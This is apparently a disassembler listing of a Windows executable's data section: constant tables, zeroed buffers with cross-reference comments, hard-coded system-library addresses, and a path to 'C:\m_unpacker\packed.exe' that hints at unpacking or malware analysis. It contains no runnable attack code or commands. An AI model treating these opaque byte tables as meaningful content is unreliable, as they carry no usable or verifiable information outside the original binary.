dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_436700 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_420942+1B�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
dd 74h, 212h dup(0)
dword_4370AC dd 3 dup(0) ; DATA XREF: sub_401F4B+68�o
dword_4370B8 dd 0 ; DATA XREF: sub_401896+13�o
; sub_4087B3+48A8�o ...
byte_4370BC db 0 ; DATA XREF: sub_40232A+10�o
; .text:0040517E�o ...
align 10h
dword_4370C0 dd 0 ; DATA XREF: sub_4035CD+18�r
; sub_403B34+92�w ...
dword_4370C4 dd 0 ; DATA XREF: .text:00403F48�r
; .text:0040426D�w ...
dd 3E6h dup(0)
dword_438060 dd 6 dup(0) ; DATA XREF: .text:00403FCA�o
; .text:00404033�o ...
dword_438078 dd 0 ; DATA XREF: sub_403661+82�w
; sub_403661+102�o
dword_43807C dd 41h dup(0) ; DATA XREF: sub_403661+41�o
dword_438180 dd 41h dup(0) ; DATA XREF: sub_403661+63�o
dword_438284 dd 0 ; DATA XREF: sub_403661+F8�w
; sub_403661+114�r
dword_438288 dd 0 ; DATA XREF: sub_403661+52�w
dword_43828C dd 0 ; DATA XREF: sub_403661+4D�w
; sub_403661+CF�r
dword_438290 dd 20h dup(0) ; DATA XREF: sub_403661+9A�o
; sub_403661+BA�o
dword_438310 dd 0 ; DATA XREF: sub_403661+8F�w
dword_438314 dd 0 ; DATA XREF: sub_403661+A7�w
; sub_403661+C7�w
dword_438318 dd 0 ; DATA XREF: sub_403661:loc_40378B�r
align 10h
dword_438320 dd 0 ; DATA XREF: sub_403661+2D5�w
; sub_403661+32E�o
dword_438324 dd 0A2h dup(0) ; DATA XREF: sub_403661+2C3�o
dword_4385AC dd 41h dup(0) ; DATA XREF: sub_403661+28D�o
dword_4386B0 dd 0 ; DATA XREF: sub_403661+2BA�w
; sub_403661+2E1�r
align 8
dword_4386B8 dd 0 ; DATA XREF: sub_403661+324�w
; sub_403661+340�r
dword_4386BC dd 0 ; DATA XREF: sub_403661+2E7�w
dword_4386C0 dd 0 ; DATA XREF: sub_403661+2F4�w
dword_4386C4 dd 0 ; DATA XREF: sub_403661+2B4�w
dd 0
dword_4386CC dd 0 ; DATA XREF: sub_403661:loc_4039B7�r
dword_4386D0 dd 0 ; DATA XREF: sub_403661+1A1�w
; sub_403661+221�o
dword_4386D4 dd 41h dup(0) ; DATA XREF: sub_403661+163�o
dword_4387D8 dd 41h dup(0) ; DATA XREF: sub_403661+182�o
dword_4388DC dd 0 ; DATA XREF: sub_403661+217�w
; sub_403661+233�r
dword_4388E0 dd 0 ; DATA XREF: sub_403661+171�w
dword_4388E4 dd 0 ; DATA XREF: sub_403661+1EE�r
dword_4388E8 dd 20h dup(0) ; DATA XREF: sub_403661+1B9�o
; sub_403661+1D9�o
dword_438968 dd 0 ; DATA XREF: sub_403661+1AE�w
dword_43896C dd 0 ; DATA XREF: sub_403661+1C6�w
; sub_403661+1E6�w
dword_438970 dd 0 ; DATA XREF: sub_403661:loc_4038AB�r
dd 13Eh dup(0)
dword_438E6C dd 1000h dup(0) ; DATA XREF: sub_4045C0+1D�o
; .text:004046D2�o ...
dword_43CE6C dd 335h dup(0) ; DATA XREF: sub_4045C0+13�o
; .text:00404719�o ...
dword_43DB40 dd 11h dup(0) ; DATA XREF: sub_4053BF+F�o
dword_43DB84 dd 3 dup(0) ; DATA XREF: .text:004058E7�o
dword_43DB90 dd 0 ; DATA XREF: sub_4062D3+2A�w
; sub_4062D3+51�r ...
dword_43DB94 dd 0 ; DATA XREF: sub_402413+45�r
; sub_402B90+AC�r ...
align 10h
dword_43DBA0 dd 0 ; DATA XREF: sub_40448A+A�o
; sub_40448A+44�r ...
dd 5 dup(0)
dword_43DBB8 dd 0 ; DATA XREF: sub_40448A+60�r
; sub_4087B3+8CE�r
dd 2D9h dup(0)
dword_43E720 dd 0 ; DATA XREF: .text:00403FA0�r
; sub_40448A+2D�o ...
dd 7Fh dup(0)
dword_43E920 dd 0 ; DATA XREF: sub_414C1C+41�w
; sub_414DA4+40�w ...
dword_43E924 dd 0 ; DATA XREF: .text:loc_403F42�r
; .text:00403F77�r ...
dword_43E928 dd 0 ; DATA XREF: sub_413440+AE�w
; sub_414C1C+52�w ...
dword_43E92C dd 0 ; DATA XREF: .text:0040582B�r
; .text:004064AD�w ...
dword_43E930 dd 0 ; DATA XREF: .text:00412005�w
; .text:0041219A�r ...
dword_43E934 dd 0 ; DATA XREF: sub_403661+122�w
; sub_403661+242�w ...
byte_43E938 db 0 ; DATA XREF: sub_40841B+91�o
; sub_4087B3+242A�r ...
align 4
dd 1B85h dup(0)
dword_445750 dd 7666h dup(0) ; DATA XREF: .data:off_42BED0�o
db 0
byte_4630E9 db 3 dup(0) ; DATA XREF: .text:off_4011EA�o
dd 80F1h dup(0)
dword_4834B0 dd 1Bh ; DATA XREF: sub_4034D1:loc_40353F�r
; sub_407BA3+3D�w ...
align 8
dword_4834B8 dd 0 ; DATA XREF: sub_407BA3:loc_40817C�o
dword_4834BC dd 20h dup(0) ; DATA XREF: sub_407BA3+572�o
; sub_407BA3+62A�o ...
dword_48353C dd 10h dup(0) ; DATA XREF: sub_407BA3+588�o
dword_48357C dd 24h dup(0) ; DATA XREF: sub_407BA3+59F�o
dword_48360C dd 0 ; DATA XREF: sub_407BA3+593�w
; sub_407BA3+641�w ...
dword_483610 dd 0 ; DATA XREF: sub_407BA3+5B2�w
align 10h
dword_483620 dd 0 ; DATA XREF: sub_40841B+72�r
; sub_4087B3+276�r
align 8
byte_483628 db 0 ; DATA XREF: sub_4085DD+28�r
; sub_4085DD+30�o
align 4
byte_48362C db 0 ; DATA XREF: sub_407BA3:loc_408206�r
; sub_407BA3+671�o
align 10h
dword_483630 dd 0 ; DATA XREF: sub_407BA3+5DE�w
; sub_407BA3+5F5�r ...
dword_483634 dd 0 ; DATA XREF: sub_407BA3+577�w
; sub_4087B3+841�r
dd 1Eh dup(0)
dword_4836B0 dd 0 ; DATA XREF: sub_414EF3+16�o
; sub_414F19+19�o
dword_4836B4 dd 2A4Dh dup(0) ; DATA XREF: sub_414E93+3D�o
db 0
byte_48DFE9 db 3 dup(0) ; DATA XREF: .text:off_40126C�o
dd 0D4Eh dup(0)
dword_491524 dd 77C72C6Bh ; DATA XREF: sub_40E59D+489�w
; sub_40E59D+4CD�r
dword_491528 dd 77EBA994h ; DATA XREF: sub_40E59D+65�w
; sub_411876+166�r
dword_49152C dd 7622A3F4h ; DATA XREF: sub_40E59D+7ED�w
; sub_40E59D+862�r ...
dword_491530 dd 71C45229h ; DATA XREF: sub_40E59D+9BA�w
; sub_40E59D+A18�r ...
dword_491534 dd 71C24870h ; DATA XREF: sub_40E59D+96C�w
; sub_40E59D+9E8�r ...
dword_491538 dd 77C71BB0h ; DATA XREF: sub_40E59D+46F�w
; sub_40E59D+4BD�r
dword_49153C dd 77D4808Bh ; DATA XREF: sub_40E59D+213�w
; sub_40E59D+234�r
dword_491540 dd 71C4502Ch ; DATA XREF: sub_40E59D+9AD�w
; sub_40E59D+A10�r ...
dword_491544 dd 77DE801Bh ; DATA XREF: sub_40E59D+354�w
; sub_40E59D+3A9�r ...
dword_491548 dd 77DDACABh ; DATA XREF: sub_40E59D+3F1�w
; sub_414190+11E�r
dword_49154C dd 77DE8075h ; DATA XREF: sub_40E59D+361�w
; sub_40E59D+3B1�r ...
dword_491550 dd 77DD7496h ; DATA XREF: sub_40E59D+3A2�w
; sub_410895+AD�r
dword_491554 dd 71AB1B7Bh ; DATA XREF: .text:00406544�r
; sub_40E59D+53C�w
dword_491558 dd 77E686CCh ; DATA XREF: sub_4054B8+1B�r
; sub_40E59D+72�w ...
dword_49155C dd 71C2498Bh ; DATA XREF: sub_40E59D+95F�w
; sub_40E59D+9DB�r ...
dword_491560 dd 77DDAB2Fh ; DATA XREF: sub_40E59D+388�w
; sub_40E59D+3C9�r ...
dword_491564 dd 7620E8C3h ; DATA XREF: sub_40E59D+83B�w
; sub_40E59D+88E�r ...
dword_491568 dd 77DD23D7h ; DATA XREF: sub_40E59D+2A5�w
; sub_40E59D+2D6�r
dword_49156C dd 76214750h ; DATA XREF: .text:00404D87�r
; sub_40E59D+82E�w ...
dword_491570 dd 77E6D75Bh ; DATA XREF: sub_40E59D+B3�w
dword_491574 dd 7620BD61h ; DATA XREF: .text:00404E56�r
; sub_40E59D+848�w ...
dword_491578 dd 71AB60C9h ; DATA XREF: sub_40E59D+52F�w
; sub_40E59D+6B2�r ...
dword_49157C dd 77EBA6E9h ; DATA XREF: sub_40E59D+58�w
; sub_40E59D+CA�r ...
dword_491580 dd 76D62A58h ; DATA XREF: sub_40E59D+916�w
dword_491584 dd 76F36EAAh ; DATA XREF: sub_4087B3:loc_40C782�r
; sub_40E59D+A66�w ...
dword_491588 dd 77E802FCh ; DATA XREF: sub_40E59D+A6�w
; sub_40E59D+F2�r
dword_49158C dd 77C75455h ; DATA XREF: sub_40E59D+462�w
; sub_40E59D+4B5�r
dword_491590 dd 71AB12A7h ; DATA XREF: sub_403ADA+20�r
; sub_40E59D+5D8�w ...
dword_491594 dd 71C574FAh ; DATA XREF: sub_40E59D+9A0�w
; sub_40E59D+A08�r
dword_491598 dd 71AB1746h ; DATA XREF: sub_40E59D+5CB�w
; sub_40E59D+736�r
dword_49159C dd 71B28D0Dh ; DATA XREF: sub_40E59D+B21�w
dword_4915A0 dd 762211EFh ; DATA XREF: sub_407BA3+5C8�r
; sub_40E59D+7E0�w ...
dword_4915A4 dd 77D902E3h ; DATA XREF: sub_40E59D+1B3�w
; sub_40FF37+15�r
dword_4915A8 dd 71C2FA86h ; DATA XREF: sub_40E59D+979�w
; sub_40E59D+9F0�r ...
dword_4915AC dd 77DE1291h ; DATA XREF: sub_40E59D+36E�w
; sub_40E59D+3B9�r ...
dword_4915B0 dd 77E2C1B3h ; DATA XREF: sub_40E59D+37B�w
; sub_40E59D+3C1�r ...
dword_4915B4 dd 73B81E3Bh ; DATA XREF: sub_40E59D+C56�w
; sub_40E59D+C5D�r
dword_4915B8 dd 71ABF628h ; DATA XREF: sub_40E59D+68E�w
dword_4915BC dd 71AB1836h ; DATA XREF: .text:004051B9�r
; .text:0040583C�r ...
dword_4915C0 dd 77C72889h ; DATA XREF: sub_40E59D+496�w
dword_4915C4 dd 71C453F8h ; DATA XREF: sub_40E59D+9C7�w
; sub_40E59D+A20�r ...
dword_4915C8 dd 77DD5C55h ; DATA XREF: sub_404954+51�r
; sub_40E59D+2B2�w ...
dword_4915CC dd 77E96645h ; DATA XREF: sub_405779+25�r
; sub_405779+39�r ...
dword_4915D0 dd 77428B97h ; DATA XREF: .text:00405089�r
; sub_4087B3+2052�r ...
dword_4915D4 dd 71AB41DAh ; DATA XREF: .text:0040783C�r
; sub_407BA3+8C�r ...
dword_4915D8 dd 762059A3h ; DATA XREF: sub_40E59D+807�w
; sub_40E59D+872�r ...
dword_4915DC dd 71C4A1B4h ; DATA XREF: sub_40E59D+986�w
; sub_40E59D+9F8�r
dword_4915E0 dd 1F7CD214h ; DATA XREF: sub_40E59D+BDF�w
; sub_40E59D+C10�r
dword_4915E4 dd 77D4456Bh ; DATA XREF: sub_40E59D+22D�w
dword_4915E8 dd 76D629BBh ; DATA XREF: sub_40E59D+8FC�w
; sub_40E59D+910�r
dword_4915EC dd 1F7B9D96h ; DATA XREF: sub_40E59D+BF9�w
dword_4915F0 dd 71AB1740h ; DATA XREF: .text:00403DD7�r
; .text:loc_40681A�r ...
dword_4915F4 dd 7620AFB6h ; DATA XREF: sub_40E59D+821�w
; sub_40E59D+855�r
dword_4915F8 dd 77D5C13Ah ; DATA XREF: sub_40E59D+220�w
; sub_40E59D+23C�r
dword_4915FC dd 77D45B19h ; DATA XREF: sub_40E59D+172�w
; sub_40E59D+1C2�r
dword_491600 dd 71AB157Eh ; DATA XREF: sub_4087B3+224D�r
; sub_4087B3+3AB4�r ...
dword_491604 dd 71AB3E5Dh ; DATA XREF: sub_402413+FC�r
; sub_402B90+5E�r ...
dword_491608 dd 71AB14DCh ; DATA XREF: sub_40E59D+549�w
; sub_40E59D+6BE�r
dword_49160C dd 0CC0004h ; DATA XREF: .text:00404D81�r
; sub_40E59D+8BD�w ...
dword_491610 dd 77DD590Bh ; DATA XREF: sub_404954+26�r
; sub_40E59D+28B�w ...
dword_491614 dd 71ABD755h ; DATA XREF: sub_4087B3+3689�r
; sub_40E59D+681�w ...
dword_491618 dd 77DF7311h ; DATA XREF: sub_40E59D+30F�w
; sub_40E59D+323�r ...
dword_49161C dd 77DDA2AFh ; DATA XREF: sub_40E59D+395�w
; sub_40E59D+3D1�r ...
dword_491620 dd 1F7CD927h ; DATA XREF: sub_40E59D+BD2�w
; sub_40E59D+C08�r
dword_491624 dd 76206853h ; DATA XREF: sub_40E59D+7FA�w
; sub_40E59D+86A�r ...
dword_491628 dd 77D4932Ch ; DATA XREF: sub_40E59D+206�w
; sub_40E59D+227�r
dword_49162C dd 77D5E310h ; DATA XREF: sub_40E59D+18C�w
; sub_40E59D+1D2�r ...
dword_491630 dd 76206B7Fh ; DATA XREF: sub_40E59D+814�w
; sub_40E59D+87A�r ...
dword_491634 dd 71AB1444h ; DATA XREF: .text:00403E37�r
; sub_40E59D+606�w ...
dword_491638 dd 77DD189Ah ; DATA XREF: sub_404954+5A�r
; sub_40E59D+2BF�w ...
dword_49163C dd 71AB3F8Dh ; DATA XREF: sub_40E59D+64D�w
; sub_40E59D+77E�r ...
dword_491640 dd 77DD5D20h ; DATA XREF: sub_40E59D+302�w
; sub_40E59D+316�r ...
dword_491644 dd 71AB1890h ; DATA XREF: sub_403BF7+82�r
; .text:00406528�r ...
dword_491648 dd 77C76B34h ; DATA XREF: sub_40E59D+42E�w
; sub_40E59D+490�r
dword_49164C dd 77D5E38Ch ; DATA XREF: sub_40E59D+199�w
; sub_40E59D+1DA�r ...
dword_491650 dd 77DDA20Bh ; DATA XREF: sub_40E59D+347�w
; sub_40E59D+39C�r ...
dword_491654 dd 76F36EEBh ; DATA XREF: sub_40E59D+A73�w
dword_491658 dd 71AB12A7h ; DATA XREF: sub_401EF5+7�r
; sub_403ADA+2B�r ...
dword_49165C dd 71AB1746h ; DATA XREF: sub_402413+DE�r
; sub_402B90+37�r ...
dword_491660 dd 77EBA595h ; DATA XREF: sub_40E59D+4B�w
; sub_40E59D+C2�r ...
dword_491664 dd 77C7531Dh ; DATA XREF: sub_40E59D+455�w
; sub_40E59D+4AD�r
dword_491668 dd 77D4BDCAh ; DATA XREF: sub_40E59D+165�w
; sub_40E59D+1BA�r ...
dword_49166C dd 71C3516Ah ; DATA XREF: sub_40E59D+9E1�w
; sub_4113B6+72�r
dword_491670 dd 71AB32CAh ; DATA XREF: sub_40E59D+667�w
; sub_40E59D+78E�r
dword_491674 dd 71AB5690h ; DATA XREF: sub_401E57+75�r
; sub_402B90+7B�r ...
dword_491678 dd 1F7CB8F8h ; DATA XREF: sub_40E59D+BEC�w
; sub_40E59D+C18�r
dword_49167C dd 77EBB1E7h ; DATA XREF: sub_40E59D+3E�w
; sub_40E59D+BA�r ...
dword_491680 dd 77DD59F0h ; DATA XREF: sub_404954+45�r
; sub_40E59D+298�w ...
dword_491684 dd 71AB5DE2h ; DATA XREF: .text:004064CD�r
; .text:00407A02�r ...
dword_491688 dd 71AB3ECEh ; DATA XREF: .text:004064B8�r
; .text:004079F0�r ...
dword_49168C dd 73B81B0Fh ; DATA XREF: sub_40E59D+C63�w
dword_491690 dd 76204E4Dh ; DATA XREF: .text:00405229�r
; sub_40E59D+85B�w ...
dword_491694 dd 0 ; DATA XREF: sub_40E59D+112�w
dword_491698 dd 1F7D886Ah ; DATA XREF: sub_40E59D+BB8�w
; sub_40E59D+BF3�r
dword_49169C dd 71AB12F8h ; DATA XREF: sub_402413+EC�r
; sub_402B90+27�r ...
dword_4916A0 dd 77C76551h ; DATA XREF: sub_40E59D+43B�w
; sub_40E59D+49D�r
dword_4916A4 dd 77C729E2h ; DATA XREF: sub_40E59D+47C�w
; sub_40E59D+4C5�r
dword_4916A8 dd 77C7212Fh ; DATA XREF: sub_40E59D+448�w
; sub_40E59D+4A5�r
dword_4916AC dd 71AB1AF4h ; DATA XREF: sub_401EF5+1B�r
; sub_401EF5+35�r ...
dword_4916B0 dd 77D5E303h ; DATA XREF: sub_40E59D+1A6�w
; sub_40E59D+1E2�r ...
dword_4916B4 dd 71C4576Ch ; DATA XREF: sub_40E59D+9D4�w
; sub_40E59D+A28�r ...
dword_4916B8 dd 77D4702Fh ; DATA XREF: sub_40E59D+158�w
; sub_40E59D+1AD�r ...
dword_4916BC dd 77E6C0E3h ; DATA XREF: sub_40545D+4�r
; sub_40E59D+8C�w ...
dword_4916C0 dd 71AB1ED3h ; DATA XREF: .text:00403DC9�r
; sub_40E59D+5F2�w ...
dword_4916C4 dd 71B2A381h ; DATA XREF: sub_40E59D+B14�w
; sub_40E59D+B30�r
dword_4916C8 dd 77DDA595h ; DATA XREF: sub_40E59D+31C�w
; sub_4117F1+55�r
dword_4916CC dd 77DD22EAh ; DATA XREF: sub_40E59D+27E�w
; sub_40E59D+2B9�r ...
dword_4916D0 dd 773F97B0h ; DATA XREF: sub_40E59D+B7B�w
dword_4916D4 dd 76D67A29h ; DATA XREF: sub_40E59D+ABD�w
; sub_4115A6+CE�r
dword_4916D8 dd 76D674FAh ; DATA XREF: sub_40E59D+AB0�w
; sub_40E59D+AB7�r ...
dword_4916DC dd 71AB3C22h ; DATA XREF: sub_402B90+46�r
; .text:004032DD�r ...
dword_4916E0 dd 71AB2BBFh ; DATA XREF: sub_4087B3+1E1C�r
; sub_4087B3+36B0�r ...
dword_4916E4 dd 1F7BA3A9h ; DATA XREF: sub_40E59D+BC5�w
; sub_40E59D+C00�r
dword_4916E8 dd 71AB401Ch ; DATA XREF: sub_4035CD+1F�r
; .text:00403F81�r ...
dword_4916EC dd 71C214BAh ; DATA XREF: sub_40E59D+993�w
; sub_40E59D+A00�r ...
dword_4916F0 dd 71AB868Dh ; DATA XREF: .text:00406569�r
; .text:00407A22�r ...
dword_4916F4 dd 71AB1A6Dh ; DATA XREF: sub_402413+18D�r
; sub_402B90+152�r ...
dword_4916F8 dd 71AB155Ah ; DATA XREF: sub_403BF7+4C�r
; .text:004064E6�r ...
dword_4916FC dd 71B22C25h ; DATA XREF: sub_40E59D+B07�w
; sub_40E59D+B28�r
dword_491700 dd 71AB5A01h ; DATA XREF: sub_40E59D+522�w
; sub_40E59D+6A6�r ...
dword_491704 dd 71B2ACCBh ; DATA XREF: sub_40E59D+AFA�w
; sub_40E59D+B1B�r
dword_491708 dd 77E78C17h ; DATA XREF: sub_407BA3+52�r
; sub_40E59D+31�w ...
dword_49170C dd 77D49A11h ; DATA XREF: sub_40E59D+17F�w
; sub_40E59D+1CA�r
dd 0
dword_491714 dd 76D62A37h ; DATA XREF: sub_40E59D+909�w
; sub_40E59D+91D�r
dword_491718 dd 77E6CBF9h ; DATA XREF: sub_40E59D+99�w
; sub_40E59D+EA�r ...
dword_49171C dd 0 ; DATA XREF: sub_40E59D:loc_40E69B�w
; sub_40E59D+12B�w ...
dword_491720 dd 0 ; DATA XREF: sub_40E59D+126�w
; sub_40F54D+1C�r
dword_491724 dd 0 ; DATA XREF: sub_40E59D:loc_40E78B�w
; sub_40E59D:loc_40E7F2�w ...
dword_491728 dd 0 ; DATA XREF: sub_40E59D+250�w
; sub_40F54D+50�r
dword_49172C dd 0 ; DATA XREF: sub_407BA3+349�r
; sub_4087B3+16C3�r ...
dword_491730 dd 0 ; DATA XREF: sub_40E59D+400�w
; sub_40F54D+84�r
dword_491734 dd 0 ; DATA XREF: sub_40E59D:loc_40EA83�w
; sub_40F54D:loc_40F5FD�r
dword_491738 dd 0 ; DATA XREF: sub_40E59D+4E1�w
; sub_40F54D+B8�r
dword_49173C dd 0 ; DATA XREF: sub_40E59D:loc_40ED54�w
; sub_40F54D:loc_40F631�r
dword_491740 dd 0 ; DATA XREF: sub_40E59D+7B2�w
; sub_40F54D+EC�r
dword_491744 dd 0 ; DATA XREF: sub_407BA3:loc_40815E�r
; sub_40E59D:loc_40EE3F�w ...
dword_491748 dd 0 ; DATA XREF: sub_40E59D+8CC�w
; sub_40F54D+120�r
dword_49174C dd 0 ; DATA XREF: sub_40E59D:loc_40EED3�w
; sub_40F54D:loc_40F699�r
dword_491750 dd 0 ; DATA XREF: sub_40E59D+931�w
; sub_40F54D+154�r
dword_491754 dd 0 ; DATA XREF: sub_4087B3+16CB�r
; sub_40E59D:loc_40EFDE�w ...
dword_491758 dd 0 ; DATA XREF: sub_40E59D+A3C�w
; sub_40F54D+188�r
dword_49175C dd 0 ; DATA XREF: sub_40E59D:loc_40F028�w
; sub_40F54D:loc_40F701�r
dword_491760 dd 0 ; DATA XREF: sub_40E59D+A86�w
; sub_40F54D+1BC�r
dword_491764 dd 0 ; DATA XREF: sub_40E59D:loc_40F072�w
; sub_40F54D:loc_40F735�r
dword_491768 dd 0 ; DATA XREF: sub_40E59D+AD0�w
; sub_40F54D+1F0�r
dword_49176C dd 0 ; DATA XREF: sub_40E59D:loc_40F0E6�w
; sub_40F54D:loc_40F769�r
dword_491770 dd 0 ; DATA XREF: sub_40E59D+B44�w
; sub_40F54D+224�r
dword_491774 dd 0 ; DATA XREF: sub_40E59D:loc_40F130�w
; sub_40F54D:loc_40F79D�r
dword_491778 dd 0 ; DATA XREF: sub_40E59D+B8E�w
; sub_40F54D+258�r
dword_49177C dd 0 ; DATA XREF: sub_40E59D:loc_40F1CE�w
; sub_40F54D:loc_40F7D1�r
dword_491780 dd 0 ; DATA XREF: sub_40E59D+C2C�w
; sub_40F54D+28C�r
dword_491784 dd 0 ; DATA XREF: sub_40E59D:loc_40F218�w
; sub_40F54D:loc_40F805�r
dword_491788 dd 0 ; DATA XREF: sub_40E59D+C76�w
; sub_40F54D+2C0�r
dd 1Fh dup(0)
dword_491808 dd 9Bh dup(0) ; DATA XREF: sub_40FC36+6A�o
dword_491A74 dd 17h dup(0) ; DATA XREF: sub_4102BD:loc_4103DA�o
; sub_4102BD+131�o ...
dword_491AD0 dd 80h dup(0) ; DATA XREF: sub_4113B6+7C�o
; sub_4113B6+A5�o
dword_491CD0 dd 0 ; DATA XREF: sub_410714+45�w
; sub_410714+4D�r ...
dword_491CD4 dd 17h dup(0) ; DATA XREF: sub_411235:loc_411357�o
; sub_411235+12D�o
dword_491D30 dd 80h dup(0) ; DATA XREF: sub_410626+4B�o
; sub_410626+7D�o ...
byte_491F30 db 0 ; DATA XREF: sub_410714+29�r
; sub_410714+34�w
align 4
dword_491F34 dd 80h dup(0) ; DATA XREF: sub_4109FE+61�o
; sub_4109FE+88�o ...
dword_492134 dd 0F1h dup(0) ; DATA XREF: sub_41014B+33�o
; sub_41014B+50�o ...
dword_4924F8 dd 6 dup(0) ; DATA XREF: sub_4116BB+32�o
dword_492510 dd 9Bh dup(0) ; DATA XREF: sub_4126D1+8D�o
byte_49277C db 0 ; DATA XREF: sub_413993+6A�r
; sub_413993+98�w
align 10h
dd 2 dup(0)
dword_492788 dd 11h dup(0) ; DATA XREF: sub_413F6C+47�o
dword_4927CC dd 0 ; DATA XREF: .text:00415EBE�r
; .text:00415EC3�w
dword_4927D0 dd 0 ; DATA XREF: sub_415E6A+A�w
align 8
dword_4927D8 dd 0 ; DATA XREF: sub_4174F2+5E�r
; sub_4174F2+A4�w
align 10h
word_4927E0 dw 0 ; DATA XREF: sub_4174F2+55�r
; sub_4174F2+9A�o
word_4927E2 dw 0 ; DATA XREF: sub_4174F2+48�r
db 2 dup(0)
word_4927E6 dw 0 ; DATA XREF: sub_4174F2+3B�r
word_4927E8 dw 0 ; DATA XREF: sub_4174F2+2E�r
word_4927EA dw 0 ; DATA XREF: sub_4174F2+21�r
align 10h
dword_4927F0 dd 0 ; DATA XREF: sub_4176C0+3B�r
; sub_4176C0+91�w
dword_4927F4 dd 0 ; DATA XREF: sub_417025+2B�w
; sub_4172D3+1B9�w ...
dword_4927F8 dd 0 ; DATA XREF: sub_417025+35�w
; sub_41BE46:loc_41BEE0�w ...
dword_4927FC dd 0 ; DATA XREF: sub_41EEE4+13A�r
dword_492800 dd 0A28h ; DATA XREF: sub_417ED0+52�w
dword_492804 dd 501h ; DATA XREF: sub_417ED0+49�w
dword_492808 dd 5 ; DATA XREF: sub_417ED0+3E�w
dword_49280C dd 1 ; DATA XREF: sub_417ED0+30�w
dword_492810 dd 1 ; DATA XREF: sub_407BA3:loc_407E98�r
; sub_41D2FF+91�w
dword_492814 dd 950B00h ; DATA XREF: sub_407BA3+2FE�r
; sub_407BA3+31E�r ...
dd 0
dword_49281C dd 950A80h ; DATA XREF: sub_41D246+44�w
; sub_4206A5+9�r ...
dword_492820 dd 0 ; DATA XREF: sub_420D89+36�r
dword_492824 dd 0 ; DATA XREF: sub_4206A5+16�r
; sub_420A73+4�r ...
dd 0
off_49282C dd offset aCM_unpackerPac ; DATA XREF: sub_41D2FF+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_492834 db 0 ; DATA XREF: sub_41784D+2D�w
; sub_41E68D+5�r
align 4
dword_492838 dd 0 ; DATA XREF: sub_41784D+27�w
dword_49283C dd 0 ; DATA XREF: sub_41784D+4�r
; sub_41784D+8B�w
dword_492840 dd 0 ; DATA XREF: sub_417ED0+84�w
; sub_41D246:loc_41D258�r ...
align 8
dword_492848 dd 0 ; DATA XREF: sub_417FC6�r sub_417FEB�r ...
dword_49284C dd 0 ; DATA XREF: sub_415CF8�r
; sub_416ED2:loc_416FCE�r ...
dword_492850 dd 0 ; DATA XREF: .text:004181DE�r
; .text:004181E3�w ...
dword_492854 dd 0 ; DATA XREF: sub_419D98+11�r
; sub_419E9C+1A�r ...
byte_492858 db 0 ; DATA XREF: sub_419D98+3�r
; sub_419D98+98�r ...
align 4
dword_49285C dd 0 ; DATA XREF: sub_419E9C+11�r
; sub_419F7A+21�w ...
byte_492860 db 0 ; DATA XREF: sub_419F7A+51�w
align 4
dword_492864 dd 0 ; DATA XREF: sub_41A170+4E�r
; sub_41A54B+3A�r ...
dword_492868 dd 0 ; DATA XREF: sub_41A170+5C�r
; sub_41A54B+43�r ...
dword_49286C dd 0 ; DATA XREF: sub_416123+7A�r
; sub_41A317+5�r
dword_492870 dd 0 ; DATA XREF: sub_41A91C+29�r
dword_492874 dd 1 ; DATA XREF: sub_41C6E5:loc_41C860�r
; sub_41C87E+4�w ...
dword_492878 dd 0 ; DATA XREF: sub_41CB5F+37�r
align 10h
dword_492880 dd 1 ; DATA XREF: sub_41CC29+28�r
; sub_41CC29+4C�w ...
dd 2 dup(0)
dword_49288C dd 0 ; DATA XREF: sub_417C24+4�r
; sub_417C24+9D�r ...
dd 3 dup(0)
dword_49289C dd 0 ; DATA XREF: sub_417D0C+61�r
; sub_417D0C+BF�r ...
dd 0
dword_4928A4 dd 0 ; DATA XREF: sub_41D06A+3A�r
; sub_41D06A+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_41D2FF:loc_41D316�o
; .data:off_49282C�o
align 4
dd 3Ah dup(0)
dword_4929AC dd 1 ; DATA XREF: sub_41D54C+2�r
; sub_41D54C+23�w ...
dword_4929B0 dd 0 ; DATA XREF: sub_41D92C+21�r
